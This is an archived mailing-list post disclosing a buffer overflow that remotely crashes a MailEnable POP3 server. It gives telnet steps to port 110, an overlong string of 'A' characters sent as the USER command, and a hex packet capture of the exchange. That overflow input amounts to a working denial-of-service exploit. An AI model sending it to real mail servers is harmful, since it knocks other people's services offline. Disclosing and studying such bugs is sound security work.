MailEnable POP3 Server remote shutdown !:/ -newest ~ (and previous) bufferoverflow-

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 


(My first post, please bare with me.)
-/\-About.-/\-
I found this problem auditing a webserver, it’s a standard bufferoverflow 
i guess,
but i am not sure how to find all the technical information but if anyone 
knows what to do i would
like to know, if some one have the time to send a brief mail or 
something :)


pop3 = mailenabled 


-/\-Method-/\-

#telnet xxx.xxx.xxx.xxx 110

(clear screen)
+OK Welcome to MailEnable POP3 Server

(then copy and paste this- 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA - and paste it to the 
terminal)

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA




-/\-Packet Capture-/\-
xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:27:765
0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E.
0010: 00 30 6C E2 00 00 80 06 5C DB D9 3D DF 70 D9 3D .0l.....\..=.p.=
0020: DF 1E 0B 79 00 6E 00 4F F5 99 00 00 00 00 70 02 ...y.n.O......p.
0030: FA F0 15 54 00 00 02 04 05 B4 01 01 04 02       ...T..........

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:27:765
0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E.
0010: 00 30 E3 8B 00 00 80 06 E6 31 D9 3D DF 1E D9 3D .0.......1.=...=
0020: DF 70 00 6E 0B 79 3B 17 72 47 00 4F F5 9A 70 12 .p.n.y;.rG.O..p.
0030: 44 70 1E 65 00 00 02 04 05 B4 01 01 04 02       Dp.e..........

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:27:795
0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E.
0010: 00 4F E3 8F 00 00 80 06 E6 0E D9 3D DF 1E D9 3D .O.........=...=
0020: DF 70 00 6E 0B 79 3B 17 72 48 00 4F F5 9A 50 18 .p.n.y;.rH.O..P.
0030: 44 70 8B 1F 00 00 2B 4F 4B 20 57 65 6C 63 6F 6D Dp....+OK Welcom
0040: 65 20 74 6F 20 4D 61 69 6C 45 6E 61 62 6C 65 20 e to MailEnable 
0050: 50 4F 50 33 20 53 65 72 76 65 72 0D 0A          POP3 Server..

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:27:775
0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E.
0010: 00 28 6C E4 00 00 80 06 5C E1 D9 3D DF 70 D9 3D .(l.....\..=.p.=
0020: DF 1E 0B 79 00 6E 00 4F F5 9A 3B 17 72 48 50 10 ...y.n.O..;.rHP.
0030: FA F0 94 A8 00 00                               ......

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:27:945
0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E.
0010: 00 28 6C F2 00 00 80 06 5C D3 D9 3D DF 70 D9 3D .(l.....\..=.p.=
0020: DF 1E 0B 79 00 6E 00 4F F5 9A 3B 17 72 6F 50 10 ...y.n.O..;.roP.
0030: FA C9 94 A8 00 00                               ......

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:28:276
0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E.
0010: 02 22 6D 07 00 00 80 06 5A C4 D9 3D DF 70 D9 3D ."m.....Z..=.p.=
0020: DF 1E 0B 79 00 6E 00 4F F5 9A 3B 17 72 6F 50 18 ...y.n.O..;.roP.
0030: FA C9 1E 3D 00 00 55 53 45 52 20 41 41 41 41 41 ...=..USER AAAAA
0040: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0060: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0070: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0080: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0090: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00A0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00B0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00C0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00D0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00E0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00F0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0100: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0110: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0120: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0130: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0140: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0150: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0160: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0170: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0180: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0190: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01A0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01B0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01C0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01D0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01E0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01F0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0200: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0210: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0A AAAAAAAAAAAAAAA.
0230:                                                 

xxx.xxx.xxx.112->xxx.xxx.xxx.30
Time 19:49:33:003
0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E.
0010: 00 28 6F 73 00 00 80 06 5A 52 D9 3D DF 70 D9 3D .(os....ZR.=.p.=
0020: DF 1E 0B 79 00 6E 00 4F F7 94 3B 17 72 6F 50 11 ...y.n.O..;.roP.
0030: FA C9 92 AD 00 00                               ......

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:28:466
0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E.
0010: 00 28 E3 BA 00 00 80 06 E6 0A D9 3D DF 1E D9 3D .(.........=...=
0020: DF 70 00 6E 0B 79 3B 17 72 6F 00 4F F7 94 50 10 .p.n.y;.ro.O..P.
0030: 42 76 4B 02 00 00 20 20 20 20 20 20             BvK...      

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:33:003
0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E.
0010: 00 28 E6 A0 00 00 80 06 E3 24 D9 3D DF 1E D9 3D .(.......$.=...=
0020: DF 70 00 6E 0B 79 3B 17 72 6F 00 4F F7 95 50 10 .p.n.y;.ro.O..P.
0030: 42 76 4B 01 00 00 20 20 20 20 20 20             BvK...      

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:33:093
0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E.
0010: 00 28 E6 AD 00 00 80 06 E3 17 D9 3D DF 1E D9 3D .(.........=...=
0020: DF 70 00 6E 0B 79 3B 17 72 6F EC A0 B4 24 50 04 .p.n.y;.ro...$P.
0030: 00 00 E4 A2 00 00 20 20 20 20 20 20             ......      
______________________________________________________________________


-/\-and so on-/\-

So now you probably seen all the misspellings and so on anyway, i hope it 
won’t cloud your mind too much.



-/\-Me Me Me.-/\-
Ketil Braun Larsen.
www.nerds-united.com
Edu.
www.It-collge.dk

"Guess that where to late huh?"
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux